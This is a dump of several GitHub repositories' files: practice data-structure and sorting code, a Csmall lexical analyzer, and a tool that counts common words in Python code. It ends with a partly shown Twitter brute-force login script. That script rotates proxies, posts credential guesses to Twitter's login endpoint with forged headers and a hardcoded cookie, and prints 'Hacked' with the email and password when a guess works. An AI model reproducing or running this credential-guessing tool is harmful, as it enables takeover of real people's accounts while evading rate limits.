false;\n }\n\n bool IsFull()\n {\n if((tail+1)%Qsize == head) return true;\n else return false;\n }\n\n int sz()\n {\n if(tail >= head) return (tail-head);\n else return (tail-head+Qsize);\n }\n\n void enqueue(int item)\n {\n if(IsFull())\n {\n printf(\"\\nQueue is full\\n\");\n return;\n }\n data[tail] = item;\n tail = (tail+1)%Qsize;\n }\n\n void dequeue()\n {\n if(IsEmpty()) printf(\"Q is empty, nothing to dq\\n\");\n else\n {\n printf(\"%d is dequeued\\n\", data[head]);\n head = (head+1)%Qsize;\n }\n }\n\n int frnt()\n {\n if(IsEmpty())\n {\n 
printf(\"\\nNo front element, empty q\\n\");\n return -1;\n }\n return data[head];\n }\n\n int rear()\n {\n if(IsEmpty())\n {\n printf(\"No tail element, empty q\\n\");\n return -1;\n }\n return data[(tail-1+Qsize)%Qsize];\n }\n\n void print()\n {\n\n }\n};\n\nint main()\n{\n Queue q;\n\n //q.dequeue();\n //q.frnt();\n //q.rear();\n\n q.enqueue(1);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(2);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(3);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(4);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(5);\n printf(\"tail = %d\\n\", q.tail);\n //printf(\"queue size is %d\\n\", q.sz());\n q.dequeue();\n q.enqueue(6);\n q.dequeue();\n //q.enqueue(7);\n printf(\"tail = %d\\n\", q.tail);\n printf(\"head idx = %d, tail idx = %d\\n\", q.head, q.tail);\n printf(\"head element = %d, tail element = %d\\n\", q.frnt(), q.rear());\n printf(\"size = %d\\n\", q.sz());\n\n\n return 0;\n}\n" }, { "alpha_fraction": 0.536281168460846, "alphanum_fraction": 0.5447846055030823, "avg_line_length": 18.83146095275879, "blob_id": "8aa88abed85abad6047ee2ee34768d44dd1c4f08", "content_id": "e1d25ae18fcc5ed76b1c25625ebc6ab722d8e540", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1764, "license_type": "no_license", "max_line_length": 46, "num_lines": 89, "path": "/Reverse a Stack.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "fail = 0\nsuccess = 1\n\nclass Stack:\n def __init__(self, size):\n self.stack = []\n self.maxSize = size\n\n def isEmpty(self):\n if len(self.stack) == 0:\n return True\n return False\n\n def isFull(self):\n if len(self.stack) == self.maxSize:\n return True\n return False\n\n def push(self, item):\n if self.isFull():\n print(\"Stack Full, can not push\")\n return fail\n\n self.stack.append(item)\n return success\n\n def pop(self):\n if self.isEmpty():\n print(\"Stack Empty, can not push\")\n return fail\n\n self.stack.pop()\n return success\n\n # position is 1 indexed\n def peek(self, position):\n return self.stack[position - 1]\n\n def count(self):\n return len(self.stack)\n\n def display(self):\n print(self.stack)\n\n def top(self):\n return self.stack[len(self.stack) - 1]\n\ndef insertAtBottom(stack, item):\n if stack.isEmpty():\n stack.push(item)\n else:\n temp = stack.top()\n stack.pop()\n insertAtBottom(stack, item)\n stack.push(temp)\n\ndef reverseStack(stack):\n if not stack.isEmpty():\n temp = stack.top()\n stack.pop()\n reverseStack(stack)\n insertAtBottom(stack, temp)\n\ndef reverse(stack, ret):\n if stack.isEmpty():\n return\n temp = stack.top()\n stack.pop()\n ret.push(temp)\n reverse(stack, ret)\n\ndef main():\n stack = Stack(10)\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n stack.display()\n print(stack.top())\n stack.pop()\n stack.display()\n\n rev = Stack(10)\n reverse(stack, rev)\n rev.display()\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.3459119498729706, "alphanum_fraction": 0.374213844537735, "avg_line_length": 17.705883026123047, "blob_id": "a5919fd45c81b82ab90df425b72b2e8121af9ebd", "content_id": "2f5368603f57ee8fa4834b9f8ba4970d29b1f938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 636, "license_type": "no_license", "max_line_length": 46, "num_lines": 34, "path": "/Odd-Even 2.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers containing at most 100 digits\nOutput: 'even' or 
'odd'\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, RMD, idx; //right most digit\n char n[101];\n\n scanf(\"%d\\n\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n scanf(\"%s\", &n);\n idx = 0;\n while(n[idx] != '\\0')\n idx++;\n //printf(\"%c\\n\", n[idx-1]);\n RMD = n[idx-1] - '0';\n if(RMD % 2)\n printf(\"odd\\n\");\n else\n printf(\"even\\n\");\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.35474860668182373, "alphanum_fraction": 0.37709498405456543, "avg_line_length": 18.14285659790039, "blob_id": "1fe7964388c0bf30753f1af7478e6fec6c4ef858", "content_id": "f4e57cf258aa592580a6677a5a8dcdfdafb8157a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 61, "num_lines": 56, "path": "/char count in a string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: 2T lines:\n a string str\n a char ch\n Output:\n instance of ch in str\n*/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\nint arr[26];\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n char str[10000], ch;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \" %[^\\n]\", str);\n fscanf(fptr, \" %c\", &ch);\n\n for(int i = 0; i < 26; i++)\n arr[i] = 0;\n\n for(int j = 0; str[j]; j++)\n str[j] = tolower(str[j]);\n\n for(int j = 0; str[j]; j++)\n arr[str[j] - 'a']++;\n\n printf(\"In %s, Count of:\\n\", str);\n for(int j = 0; j < 26; j++)\n {\n if(arr[j])\n printf(\"%c --> %d\\n\", ('a' + j), arr[j]);\n }\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n\n" }, { "alpha_fraction": 0.37919461727142334, "alphanum_fraction": 0.4161073863506317, "avg_line_length": 17.6875, "blob_id": "c59edddf8071d8c5e08b590ab89368d53278c034", "content_id": "b248441498544509d991b97e5ea5e90dfabf3c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/Sieve Prime.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "import math\ndef sieve(n):\n prime = [True] * n\n\n for i in range(2, int(math.sqrt(n))+1):\n j = 2\n if prime[i]:\n while(i*j < n):\n prime[i*j] = False\n j += 1\n\n for i in range(2, n):\n if prime[i]:\n print(i)\n\nsieve(100000)" }, { "alpha_fraction": 0.3497989773750305, "alphanum_fraction": 0.3653073012828827, "avg_line_length": 18.33333396911621, "blob_id": "cc00c496d5342d180d81568990541f4fd1832153", "content_id": "fd4e5da4c23d862116aef430fd0e38ad7f82b274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 57, "num_lines": 90, "path": "/sort.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nusing namespace std;\n\nvoid swapN(int *a, int *b)\n{\n int temp = *a;\n *a = *b;\n *b = temp;\n}\n\nvoid SelectionSort(int arr[], int n)\n{\n int index_min, temp;\n for(int i = 0; i < (n-1); i++)\n {\n index_min = i;\n for(int j = i; j < n; j++)\n {\n if(arr[j]<arr[index_min]) index_min = j;\n }\n\n if(index_min != i)\n {\n swapN(&arr[i], &arr[index_min]);\n// temp = arr[i];\n// arr[i] = arr[index_min];\n// 
arr[index_min] = temp;\n }\n }\n}\n\nvoid BubbleSort(int arr[], int n)\n{\n for(int i = 0; i < (n-1); i++)\n {\n bool flag = true;\n for(int j = 0; j < (n-1); j++)\n {\n if(arr[j]>arr[j+1])\n {\n swapN(&arr[j], &arr[j+1]);\n flag = false;\n }\n }\n\n printf(\"\\nafter %dth iteration\\n\", i);\n for(int j = 0; j < n; j++) printf(\"%d \", arr[j]);\n\n if(flag) break;\n }\n}\n\nvoid InsertionSort(int arr[], int n)\n{\n int j, idx, item, flag;\n for(int i = 1; i < n; i++)\n {\n //flag = 1;\n item = arr[i];\n j = i-1;\n\n //for(int j = idx; j >= 0; j--)\n while(j >= 0 && arr[j]>item)\n {\n// if(arr[j] < item)\n// {\n// idx = j;\n// flag = 0;\n// break;\n// }\n arr[j+1] = arr[j];\n j--;\n }\n\n arr[j+1] = item;\n\n printf(\"\\nafter %dth iteration\\n\", i);\n for(int j = 0; j < n; j++) printf(\"%d \", arr[j]);\n }\n}\n\nint main()\n{\n int arr[] = {3, 1, 2, 5, 4};\n\n InsertionSort(arr, 5);\n //for(int i = 0; i < 5; i++) printf(\"%d \", arr[i]);\n\n return 0;\n}\n\n" } ]
31
felipefrm/lexical-analyzer
https://github.com/felipefrm/lexical-analyzer
f7415afc28a812cd7e4d70a98ca2850d9884c912
09403b188caf691b39f4636822db844fa7248b8f
bcf9e50d594f6d6fe64faee276cbf43659275078
refs/heads/master
2023-03-13T21:02:43.936442
2021-03-13T00:32:17
2021-03-13T00:32:17
345,463,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.26143792271614075, "alphanum_fraction": 0.26143792271614075, "avg_line_length": 18.125, "blob_id": "828d5c398e2483cebd8825d2b1fd318d267007d2", "content_id": "c9e165a384065e775c8d33f8b9f0f51ed1c94ebf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "permissive", "max_line_length": 23, "num_lines": 32, "path": "/token_csmall.py", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "tokens = {\n \"main\": \"MAIN\",\n \"int\": \"INT\",\n \"float\": \"FLOAT\",\n \"if\": \"IF\",\n \"else\": \"ELSE\",\n \"while\": \"WHILE\",\n \"for\": \"FOR\",\n \"read\": \"READ\",\n \"print\": \"PRINT\",\n \"(\": \"LBRACKET\",\n \")\": \"RBRACKET\",\n \"{\": \"LBRACE\",\n \"}\": \"RBRACE\",\n \",\": \"COMMA\",\n \";\": \"PCOMMA\",\n \"=\": \"ATTR\",\n \"==\": \"EQ\",\n \"!=\": \"NE\",\n \"||\": \"OR\",\n \"&&\": \"AND\",\n \"<\": \"LT\",\n \"<=\": \"LE\",\n \">\": \"GT\",\n \">=\": \"GE\",\n \"+\": \"PLUS\",\n \"-\": \"MINUS\",\n \"*\": \"MULT\",\n \"/\": \"DIV\",\n \"[\": \"LCOL\",\n \"]\": \"RCOL\" \n}\n" }, { "alpha_fraction": 0.579211950302124, "alphanum_fraction": 0.5873196125030518, "avg_line_length": 32.879119873046875, "blob_id": "8959502b7e0bc9fd687d5fe2a66b83877991bcb3", "content_id": "ede7a2ca13349915428881eba764b730ff277d0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6198, "license_type": "permissive", "max_line_length": 146, "num_lines": 182, "path": "/analyzer.py", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "from token_csmall import tokens\nfrom tabulate import tabulate\nimport argparse\nimport re\n\n# Argumentos da linha de comandos: -i [arquivo de entrada .c] -o [arquivo de saida contendo os tokens]\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\"insert the path and name of a .c file (DEFAULT: 'input/teste_attr1.c')\", default=\"input/teste_attr1.c\")\nparser.add_argument(\"-o\", \"--output\", help=\"insert the path and name of output file (DEFAULT: 'output/output.txt')\", default=\"output/output.txt\")\nargs = parser.parse_args()\n\nf_in = open(args.input, \"r\") # Le arquivo de entrada\n\ntoken_list = [] # Lista de tokens identificados \nbuffer = [] # Buffer que forma o lexema\nstate = 0 # Estado inicial do automato\nline_count = 1 \n\nfor line in f_in: # Percorre todas as linhas do arquivo de entrada\n line = line.rstrip('\\n')\n char_count = 0\n\n while (char_count < len(line)): # Percorre todos os caracteres da linha\n char = line[char_count]\n\n if state == 0:\n if char.isalpha():\n state = 1\n buffer.append(char)\n elif char.isnumeric():\n state = 2\n buffer.append(char)\n elif char == '<':\n state = 5\n buffer.append(char)\n elif char == '>':\n state = 6\n buffer.append(char)\n elif char == '=':\n state = 7\n buffer.append(char)\n elif char == '!':\n state = 8\n buffer.append(char)\n elif char == '|':\n state = 9\n buffer.append(char)\n elif char == '&':\n state = 10\n buffer.append(char)\n elif char == ' ':\n pass\n else:\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 1:\n if re.match('^[a-zA-Z0-9_]*$', char):\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme] if lexeme in tokens else 
\"ID\", lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 2:\n if char.isnumeric():\n buffer.append(char)\n elif char == '.':\n state = 3\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append(['INTEGER_CONST', lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n \n elif state == 3:\n if char.isnumeric():\n state = 4\n buffer.append(char)\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 4:\n if char.isnumeric():\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append(['FLOAT_CONST', lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 5:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 6:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 7:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 8:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 9:\n if (char == '|'):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 10:\n if (char == '&'):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n \n char_count += 1\n line_count += 1\n\n# Ultimo token refere ao fim do arquivo -> EOF\ntoken_list.append(['EOF', '', line_count])\n\n# Escreve no arquivo de saida os tokens identificados na produção\nf_out = open(args.output, 
\"w\")\nf_out.write(tabulate(token_list, headers=['Token', 'Lexema', 'Linha']))\nf_out.close()\n\nf_in.close()\n\n" }, { "alpha_fraction": 0.7085019946098328, "alphanum_fraction": 0.7145748734474182, "avg_line_length": 22.5238094329834, "blob_id": "0e56da3d19343bed8aab1f941e81f748a303668d", "content_id": "7b41b6a54fe201f165fd510ff845c8b7b64c9172", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 494, "license_type": "permissive", "max_line_length": 94, "num_lines": 21, "path": "/README.md", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "# Lexical Analyzer for CSmall Language\n\n### 1. Csmall\nCsmall is a subset of the C programming language, with a reduced amount of tokens.\n\n### 1. How To Run\n```sh\n # Clone this repository\n $ git clone https://github.com/felipefrm/lexical-analyzer.git\n\n # Go into the repository\n cd lexical-analyzer\n\n # install dependency\n $ pip install tabulate\n\n # run the app\n $ python3 -i [input file containing the csmall code] -o [output file with identified tokens]\n\n # check the output file\n```\n" } ]
3
alex-px/most-common
https://github.com/alex-px/most-common
77d2be3b447e54ce08ac7bee6b68a3dd5bcdf892
6a752b5f2724f86f9665282ac0e5e5823cc1776b
dff0e5f2f79e21e29692d684c2e85f9a64baee01
refs/heads/master
2021-07-05T14:01:01.153724
2017-09-30T15:21:15
2017-09-30T15:21:15
103,992,863
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.551487386226654, "alphanum_fraction": 0.5743706822395325, "avg_line_length": 19.85714340209961, "blob_id": "6010c2435a677edc103ef96a0042102053231b95", "content_id": "9b93610ae1a972e26235c46cb7842fd32e9b9f90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "permissive", "max_line_length": 56, "num_lines": 21, "path": "/helpers.py", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "from nltk import pos_tag\n\n\ndef flat(_list):\n \"\"\" [(1,2), (3,4)] -> [1, 2, 3, 4]\"\"\"\n return sum([list(item) for item in _list], [])\n\n\ndef is_verb(word):\n if not word:\n return False\n pos_info = pos_tag([word])\n return pos_info[0][1] == 'VB'\n\n\ndef split_snake_case_to_words(name):\n return [word for word in name.split('_') if word]\n\n\ndef is_magic_name(name):\n return name.startswith('__') and name.endswith('__')" }, { "alpha_fraction": 0.6754874587059021, "alphanum_fraction": 0.688022255897522, "avg_line_length": 26.615385055541992, "blob_id": "4129f695804f250188e8fcb8574ffe0030d1fed2", "content_id": "f822156c6422627e900c6d781c1de74abe246268", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "permissive", "max_line_length": 111, "num_lines": 26, "path": "/README.md", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "## python-most-common\nPython script for calculating occurrences of words, verbs or function names in .py files in specified location.\n\n#### Usage\nJust run most_common.py with python interpreter and with desired command/arguments.\n\n##### Commands:\n- words\n```bash\n$ pyhton most_common.py words --path /tmp/my-scripts --top 4\n```\n- verbs\n```bash\n$ pyhton most_common.py verbs --path /tmp/my-scripts\n```\n- functions\n```bash\n$ pyhton most_common.py functions\n```\n\n##### Arguments:\n- Path for parsing: `--path` When not specified, current working directory is used.\n- Number of values in resulting set: `--top` If absent, full set will be returned.\n\n##### Output: \n[('path', 18), ('names', 14), ('name', 14), ('tree', 12)]\n" }, { "alpha_fraction": 0.6396193504333496, "alphanum_fraction": 0.6413723826408386, "avg_line_length": 29.71538543701172, "blob_id": "29024ea69dc39db1ef1084868aedc1d890916ecf", "content_id": "d0f870d9da3b754a5f6aa8cf741766e80075fb0d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3993, "license_type": "permissive", "max_line_length": 78, "num_lines": 130, "path": "/most_common.py", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "from argparse import ArgumentParser\nimport ast\nimport collections\nimport os\n\nfrom helpers import (is_verb,\n flat,\n split_snake_case_to_words,\n is_magic_name)\n\n\ndef find_py_files_in_path(root):\n py_files = []\n for current_dir, sub_dirs, files in os.walk(root):\n for current_file in files:\n if not current_file.endswith('.py'):\n continue\n py_files.append(os.path.join(current_dir, current_file))\n return py_files\n\n\ndef resolve_file_into_tree(file_path):\n with open(file_path, 'r', encoding='utf-8') as attempt_handler:\n main_file_content = attempt_handler.read()\n try:\n return ast.parse(main_file_content)\n except SyntaxError as e:\n print(e)\n\n\ndef fetch_trees_from_path(_path):\n trees = []\n py_files = find_py_files_in_path(_path)\n print('total %s py files found' % len(py_files))\n\n 
for py_file in py_files:\n tree = resolve_file_into_tree(py_file)\n if not tree:\n continue\n trees.append(tree)\n print('trees generated')\n return trees\n\n\ndef find_all_names_in_tree(tree):\n return [node.id for node in ast.walk(tree) if isinstance(node, ast.Name)]\n\n\ndef find_function_names_in_tree(tree):\n return [node.name.lower()\n for node in ast.walk(tree)\n if isinstance(node, ast.FunctionDef)]\n\n\ndef extract_verbs_from_snake_case(name):\n return [word for word\n in split_snake_case_to_words(name)\n if is_verb(word)]\n\n\ndef receive_names_in_path(_path):\n all_names = []\n for tree in fetch_trees_from_path(_path):\n all_names.extend(find_all_names_in_tree(tree))\n\n return flat([split_snake_case_to_words(name)\n for name in all_names\n if not is_magic_name(name)])\n\n\ndef receive_function_names_in_path(_path):\n function_names = []\n for tree in fetch_trees_from_path(_path):\n function_names.extend(find_function_names_in_tree(tree))\n return [f_name for f_name in function_names if not is_magic_name(f_name)]\n\n\ndef receive_function_verbs_in_path(_path):\n return flat([extract_verbs_from_snake_case(function_name)\n for function_name\n in receive_function_names_in_path(_path)])\n\n\ndef get_top_words_in_path(path, top=10):\n all_words = receive_names_in_path(path)\n return collections.Counter(all_words).most_common(top)\n\n\ndef get_top_verbs_in_path(path, top=10):\n all_verbs = receive_function_verbs_in_path(path)\n return collections.Counter(all_verbs).most_common(top)\n\n\ndef get_top_functions_names_in_path(path, top=10):\n all_function_names = receive_function_names_in_path(path)\n return collections.Counter(all_function_names).most_common(top)\n\n\ndef parse_args():\n parser = ArgumentParser(description='Calculate words occurrences in path')\n\n subparsers = parser.add_subparsers()\n\n parser_words = subparsers.add_parser(\n 'words',\n help='- words occurrences')\n parser_words.add_argument('--path', help='path to parse', default='./')\n parser_words.add_argument('--top', help='top number to return', type=int)\n parser_words.set_defaults(func=get_top_words_in_path)\n\n parser_verbs = subparsers.add_parser(\n 'verbs',\n help='- verbs occurrences')\n parser_verbs.add_argument('--path', help='path to parse', default='./')\n parser_verbs.add_argument('--top', help='top number to return', type=int)\n parser_verbs.set_defaults(func=get_top_verbs_in_path)\n\n parser_funcs = subparsers.add_parser(\n 'functions',\n help='- function names occurrences')\n parser_funcs.add_argument('--path', help='path to parse', default='./')\n parser_funcs.add_argument('--top', help='top number to return', type=int)\n parser_funcs.set_defaults(func=get_top_functions_names_in_path)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n print(args.func(args.path, args.top))\n" } ]
3
Harbif/Brute-Force-Twitter
https://github.com/Harbif/Brute-Force-Twitter
a94f86f54fc2d923d0d0b3f702003f68f2fe2ce2
68c068fb1246005f220dafa95d11add92cfa4c5b
b180aadb104347683c44ff6f026217b669da4ae2
refs/heads/main
2023-08-21T18:28:01.043215
2021-09-18T10:28:02
2021-09-18T10:28:02
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 21, "blob_id": "a6ea1cc65792b6d30093f282563081323ad471fa", "content_id": "45cbc8d4a092fd6c3484cd198382dec6b9498c6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21, "license_type": "no_license", "max_line_length": 21, "num_lines": 1, "path": "/README.md", "repo_name": "Harbif/Brute-Force-Twitter", "src_encoding": "UTF-8", "text": "# Brute-Force-Twitter" }, { "alpha_fraction": 0.5953512787818909, "alphanum_fraction": 0.6756471395492554, "avg_line_length": 45.74074172973633, "blob_id": "dbd8221b117f89b48f80dfe3c13d416101e2ac09", "content_id": "5d21ea878f6efa1d33c12704368dd29731cc67dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3965, "license_type": "no_license", "max_line_length": 569, "num_lines": 81, "path": "/Brute-Force-Twitter.py", "repo_name": "Harbif/Brute-Force-Twitter", "src_encoding": "UTF-8", "text": "try:\n\timport requests,random,time,os,colorama,pyfiglet\nexcept ModuleNotFoundError:\n\tos.system('pip install requests')\n\tos.system('pip install colorama')\n\tos.system('pip uninstall colorama')\n\tos.system('pip install colorama')\n\tos.system('pip install pyfiglet')\n\tprint('\\n\\t>[+] Done Downloading ')\nprint(colorama.Fore.CYAN+\"[$] Brute Force\")\nprint(str(pyfiglet.figlet_format('Twitter'))+f\"By {colorama.Fore.RED}@TweakPY - @vv1ck </>\\n{colorama.Fore.RESET}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\")\nID=input('[+] Enter YOUR ID : ')\ntoken=input('[+] Enter TOKEN BOT : ')\ndef CHECK(user,pess):\n\ttry:\n\t\tproxylist=[]\n\t\tproxy=open('proxy.txt', 'r').read().splitlines()\n\texcept FileNotFoundError:\n\t\tprint(colorama.Fore.RED+\"\\n[-] Proxy's File Not Found !\\n\"+colorama.Fore.RESET)\n\t\texit()\n\tfor pxr in proxy:\n\t\tproxylist.append(pxr)\n\t\tpxx=str(random.choice(proxylist))\n\thead={\n\t\t#head-data by @6g7r\n\t\t'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n\t\t'Accept-Encoding': 'gzip, deflate, br',\n\t\t'Accept-Language': 'ar,en-US;q=0.7,en;q=0.3',\n\t\t'Content-Length': '901',\n\t\t'Content-Type': 'application/x-www-form-urlencoded',\n\t\t'Cookie': 'personalization_id=\"v1_aFGvGiam7jnp1ks4ml5SUg==\"; guest_id=v1%3A161776685629025416; gt=1379640315083112449; ct0=de4b75112a3f496676a1b2eb0c95ef65; _twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIA8a6p4AToMY3NyZl9p%250AZCIlM2RlMDA1MzYyNmJiMGQwYzQ1OGU2MjFhODY5ZGU5N2Y6B2lkIiU4ODM0%250AMjM5OTNlYjg0ZGExNzRiYTEwMWE0M2ZhYTM0Mw%253D%253D--f5b0bce9df3870f1a221ae914e684fbdc533d03d; external_referer=padhuUp37zjgzgv1mFWxJ12Ozwit7owX|0|8e8t2xd8A2w%3D; _mb_tk=10908ac0975311eb868c135992f7d397',\n\t\t'Host': 'twitter.com',\n\t\t'Origin': 'https://twitter.com',\n\t\t'Referer': 'https://twitter.com/login?lang=ar',\n\t\t'TE': 'Trailers',\n\t\t'Upgrade-Insecure-Requests': '1',\n\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0', }\n\tdata={\n\t\t'redirect_after_login': '/',\n\t\t'remember_me': '1',\n\t\t'authenticity_token': '10908ac0975311eb868c135992f7d397',\n\t\t'wfa': '1',\n\t\t'ui_metrics': 
'{\\\"rf\\\":{\\\"ab4c9cdc2d5d097a5b2ccee53072aff6d2b5b13f71cef1a233ff378523d85df3\\\":1,\\\"a51091a0c1e2864360d289e822acd0aa011b3c4cabba8a9bb010341e5f31c2d2\\\":84,\\\"a8d0bb821f997487272cd2b3121307ff1e2e13576a153c3ba61aab86c3064650\\\":-1,\\\"aecae417e3f9939c1163cbe2bde001c0484c0aa326b8aa3d2143e3a5038a00f9\\\":84},\\\"s\\\":\\\"MwhiG0C4XblDIuWnq4rc5-Ua8dvIM0Z5pOdEjuEZhWsl90uNoC_UbskKKH7nds_Qdv8yCm9Np0hTMJEaLH8ngeOQc5G9TA0q__LH7_UyHq8ZpV2ZyoY7FLtB-1-Vcv6gKo40yLb4XslpzJwMsnkzFlB8YYFRhf6crKeuqMC-86h3xytWcTuX9Hvk7f5xBWleKfUBkUTzQTwfq4PFpzm2CCyVNWfs-dmsED7ofFV6fRZjsYoqYbvPn7XhWO1Ixf11Xn5njCWtMZOoOExZNkU-9CGJjW_ywDxzs6Q-VZdXGqqS7cjOzD5TdDhAbzCWScfhqXpFQKmWnxbdNEgQ871dhAAAAXiqazyE\\\"}',\n\t\t'session[username_or_email]': user,\n\t\t'session[password]': pess}\n\ttry:\n\t\ttime.sleep(0.7)\n\t\tproxx={\n\t\t\t'http': f'http://{pxx}',\n\t\t\t'https': f'http://{pxx}'}\n\t\treq=requests.post(f'https://twitter.com/sessions',headers=head,data=data,proxies=proxx,timeout=3)\n\t\tif (\"ct0\") in req.cookies:\n\t\t\tprint(colorama.Fore.GREEN+'--------------------------------')\n\t\t\tprint(f'Hacked: [{user}:{pess}] ')\n\t\t\tYES=f\"\"\"\n[✓] Hacked :\n[✓] Email: {user}\n[✓] Pass: {pess}\n━━━━━━━━━━━━━\"\"\"\n\t\t\tprint(\"[/] 